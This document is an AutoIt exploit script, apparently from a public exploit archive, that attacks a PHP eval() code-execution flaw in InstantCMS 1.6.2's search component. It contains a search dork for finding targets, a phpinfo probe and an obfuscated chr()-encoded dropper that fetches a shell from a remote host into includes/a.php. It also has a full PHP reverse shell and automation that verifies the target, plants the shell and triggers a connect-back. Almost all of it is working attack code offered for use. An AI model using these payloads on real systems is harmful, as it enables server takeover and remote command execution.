#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=exploit.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Inet.au3>
#include <String.au3>

#cs

Demo vid: http://youtu.be/j_RIPh-nYpY
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png

Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip

Or:

http://www.instantcms.ru/download.html

Dork: InstantCMS © 2007-2010

In Wild i found 1.7 versions too which is vulnerable too.
<?php
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php
/*********************************************************************************************/
// //
//                              InstantCMS v1.6   (c) 2010 FREEWARE                          //
//   http://www.instantcms.ru/, info@instantcms.ru                      //
//                                                                                           //
//     written by Vladimir E. Obukhov, 2007-2010                        //
//                                                                                           //
/*********************************************************************************************/




// SNIP//

if ($look == 'phrase'){
                $against .= '\"'.$query.'\"';
            }

//RUN SEARCH PROCESSORS
//get list of components and look for search processor in component folder
$sql = "SELECT link FROM cms_components";
$rs = $inDB->query($sql) ;
if ($inDB->num_rows($rs)){
while ($component = $inDB->fetch_assoc($rs)){
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';
if (file_exists($spfile)){
if (in_array($component['link'], $cfg['comp'])){
include $spfile;
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
}
}
}
}


// EOF SNIP //

Notice: eval() cunstruction.

Exploitation:
Payload: ${echo phpinfo()}

site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords

Drop shell?NP.

=======================================================================================
<?php

/*

Simple Payload generator

*/


$str='http://search.tld/andfind.txt';//shell url. you'll drop it from server which is in under your control.//


echo '<pre>' . PHP_EOL;
for($z=0;$z<=strlen($str)-1;$z++)
{
    $z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg;
    }?>

=======================================================================================

Then drop it using the following way:

${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}



As reverse shell uses:


<?php
error_reporting(0);
set_time_limit(0);
$ip=trim((string)$_SERVER['REMOTE_ADDR']);
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);
if (empty($port)){ die('<!-- Welcome BH -->');}
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));
while($alive=@socket_read($socket, 31337))
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);





#ce


$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld' &  ' yournetcatport' & @CRLF
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';
$pissagainst_wind='<!-- Welcome BH -->';
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
#cs
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));
exit;
#ce


ConsoleWrite($triptrop & '#  instantCMS_20100515_v1.6.2 PHP Code Execution Exploit     # ' & @CRLF & _
'#                     *Via Reverse Shell*                    #'         & @CRLF & _
'# Usage: ' &  @ScriptName &  '  http://site.tld' &  ' yournetcatport         #'  & @CRLF & _
'#                        /AkaStep                            #' &  $triptrop)



if  $CmdLine[0] <> 2 Then
  ;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
  MsgBox(64,"",$msg_usage);
  exit;
EndIf



$rsite=$CmdLine[1];

$PayloadUA=$CmdLine[2];


ConsoleWrite($triptrop & '[+]               Verifying vulnerability                  [+]' & $triptrop);

HttpSetUserAgent($fakeua);
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);
if StringInStr($isvulnerable,'allow_url_fopen') Then
ConsoleWrite($triptrop & '[+]            WoHoo! Remote Site Is vulnerable!           [+]' & $triptrop);
Else
ConsoleWrite($triptrop & '[-]           Sorry Dude:( Not vulnerable:(                [-]' & $triptrop);
exit;
EndIf

#cs

Time To get reversel shell!
First we'll drop our shell as includes/a.php
Then we'll check for shell existense.
If exists then we'll try bc to us.


${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords



#ce


#cs
EXPLOITING!
#ce
HttpSetUserAgent($fakeua)
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)

sleep(Random(1500,3000,1));//random sleep for few seconds


#cs
Now checking for existence of our dropped shell.
#ce


HttpSetUserAgent($fakeua)

$dont=_INetGetSource($rsite & '/includes/a.php',True)

if StringInStr($dont,$pissagainst_wind) Then
ConsoleWrite($triptrop & '[+]          Seems We Are going To Travel xD!              [+]' & $triptrop)


Else
ConsoleWrite($triptrop & "[+]            Can't find Shell! Try to exploit Manually!          [+]" & $triptrop);
exit;
EndIf



#cs
And Finally Getting Reverse Shell
#ce

HttpSetUserAgent($PayloadUA)

InetGet($rsite & '/includes/a.php','',1,1)



ConsoleWrite($triptrop & "[+]                     Happy Travel!                      [+]" & $triptrop);
exit;



#cs


================================================
           KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net

================================================

/AkaStep





#ce